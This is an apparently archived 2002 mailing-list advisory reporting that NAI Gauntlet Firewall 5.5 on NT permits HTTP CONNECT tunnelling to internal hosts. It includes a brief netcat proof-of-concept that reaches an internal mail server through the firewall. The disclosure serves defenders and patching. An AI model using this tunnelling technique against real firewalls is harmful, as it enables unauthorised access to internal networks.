NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)

From: Rashed Alabbar (rashed.alabbarat_private)
Date: Thu Feb 28 2002 - 06:33:26 PST

    Hi all,

        I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
    4. These vulnerabilities were found in other firewalls, specifically
    proxy firewalls, and I tried them on the Gauntlet, it worked.

    I don't know if this was published earlier or not, but here it goes:

    Vulnerability:
    - Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
    4131)

    Examples: (I'm using Volker Tanger [volker.tangerat_private]'s email:
    "CheckPoint FW1 HTTP Security Hole" example as a template for my
    example)

    Client = x.x.x.x
    Gauntlet = y.y.y.y
    Internal Mailserver = z.z.z.z

    nc -v -n y.y.y.y 80
    (UNKNOWN) [y.y.y.y] 80 (?) open
    CONNECT z.z.z.z:25 HTTP/1.0

    HTTP/1.0 200 OK

    mail server banner

    That's it!

    Rashed Alabbar
    Engineer\ Security Management and Operations
    Security Operations Center
    Data Fort - Total Security Solutions
    Dubai Internet City
    P.O. Box: 500006, Dubai, United Arab Emirates
    Email:   rashed.alabbarat_private
    http://www.datafort.net
    The preceding E-mail message contains information that is confidential,
    may be protected by the attorney-client or other applicable privileges,
    and may constitute non-public information, which is intended to be
    conveyed only to the designated recipients (s). If you are not an
    intended recipient of this message, please notify the sender at (+9714)
    391 3040 or via same e-mail. Unauthorized use, dissemination,
    distribution, or reproduction of this message is strictly prohibited and
    may be unlawful. Internet communications cannot be guaranteed to be
    secured or error-free as information could be intercepted, corrupted,
    lost, arrive late or contain viruses. The sender therefore does not
    accept liability for any errors or omissions in the context of this
    message which arise as a result of Internet transmission.